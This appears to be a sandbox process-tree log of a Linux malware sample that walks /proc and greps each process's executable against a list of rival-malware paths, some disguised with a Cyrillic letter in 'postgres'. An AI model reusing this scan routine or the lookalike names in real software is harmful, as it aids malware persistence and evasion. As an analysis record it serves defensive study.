/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/lsls -latrh /proc/212⤵PID:866
-
-
/bin/grepgrep exe2⤵PID:867
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:869
-
-
/bin/grepgrep exe2⤵PID:872
-
-
/bin/lsls -latrh /proc/222⤵PID:871
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:874
-
-
/bin/lsls -latrh /proc/232⤵PID:876
-
-
/bin/grepgrep exe2⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:882
-
-
/bin/lsls -latrh /proc/2362⤵PID:881
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:884
-
-
/bin/grepgrep exe2⤵PID:887
-
-
/bin/lsls -latrh /proc/242⤵PID:886
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:892
-
-
/bin/lsls -latrh /proc/2552⤵PID:891
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:894
-
-
/bin/grepgrep exe2⤵PID:897
-
-
/bin/lsls -latrh /proc/32⤵PID:896
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:899
-
-
/bin/grepgrep exe2⤵PID:902
-
-
/bin/lsls -latrh /proc/3322⤵PID:901
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:904
-
-
/bin/grepgrep exe2⤵PID:907
-
-
/bin/lsls -latrh /proc/3342⤵PID:906
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/362⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:917
-
-
/bin/lsls -latrh /proc/3602⤵PID:916
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:919
-
-
/bin/grepgrep exe2⤵PID:922
-
-
/bin/lsls -latrh /proc/3622⤵PID:921
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:927
-
-
/bin/lsls -latrh /proc/3642⤵PID:926
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:929
-
-
/bin/grepgrep exe2⤵PID:933
-
-
/bin/lsls -latrh /proc/372⤵PID:931
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:936
-
-
/bin/grepgrep exe2⤵PID:939
-
-
/bin/lsls -latrh /proc/3812⤵PID:938
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:942
-
-
/bin/grepgrep exe2⤵PID:946
-
-
/bin/lsls -latrh /proc/3842⤵PID:945
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:948
-
-
/bin/grepgrep exe2⤵PID:952
-
-
/bin/lsls -latrh /proc/3912⤵PID:951
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:955
-
-
/bin/grepgrep exe2⤵PID:959
-
-
/bin/lsls -latrh /proc/42⤵PID:958
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:962
-
-
/bin/grepgrep exe2⤵PID:965
-
-
/bin/lsls -latrh /proc/4202⤵PID:964
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:968
-
-
/bin/grepgrep exe2⤵PID:972
-
-
/bin/lsls -latrh /proc/52⤵PID:971
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:974
-
-
/bin/grepgrep exe2⤵PID:979
-
-
/bin/lsls -latrh /proc/62⤵PID:978
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:981
-
-
/bin/grepgrep exe2⤵PID:985
-
-
/bin/lsls -latrh /proc/6742⤵PID:984
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:988
-
-
/bin/grepgrep exe2⤵PID:992
-
-
/bin/lsls -latrh /proc/6772⤵PID:991
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:995
-
-
/bin/grepgrep exe2⤵PID:998
-
-
/bin/lsls -latrh /proc/6802⤵PID:997
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1001
-
-
/bin/grepgrep exe2⤵PID:1005
-
-
/bin/lsls -latrh /proc/6812⤵PID:1004
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1007
-
-
/bin/grepgrep exe2⤵PID:1011
-
-
/bin/lsls -latrh /proc/692⤵PID:1010
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1014
-
-
/bin/grepgrep exe2⤵PID:1018
-
-
/bin/lsls -latrh /proc/72⤵PID:1017
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1021
-
-
/bin/grepgrep exe2⤵PID:1024
-
-
/bin/lsls -latrh /proc/702⤵PID:1023
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1027
-
-
/bin/grepgrep exe2⤵PID:1031
-
-
/bin/lsls -latrh /proc/7162⤵PID:1030
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1033
-
-
/bin/grepgrep exe2⤵PID:1038
-
-
/bin/lsls -latrh /proc/722⤵PID:1037
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1040
-
-
/bin/grepgrep exe2⤵PID:1044
-
-
/bin/lsls -latrh /proc/7262⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1047
-
-
/bin/grepgrep exe2⤵PID:1050
-
-
/bin/lsls -latrh /proc/7272⤵PID:1049
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1053
-
-
/bin/lsls -latrh /proc/732⤵PID:1057
-
-
/bin/grepgrep exe2⤵PID:1058
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1061
-
-
/bin/grepgrep exe2⤵PID:1064
-
-
/bin/lsls -latrh /proc/7312⤵PID:1063
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1067
-
-
/bin/grepgrep exe2⤵PID:1072
-
-
/bin/lsls -latrh /proc/7322⤵PID:1071
-
-
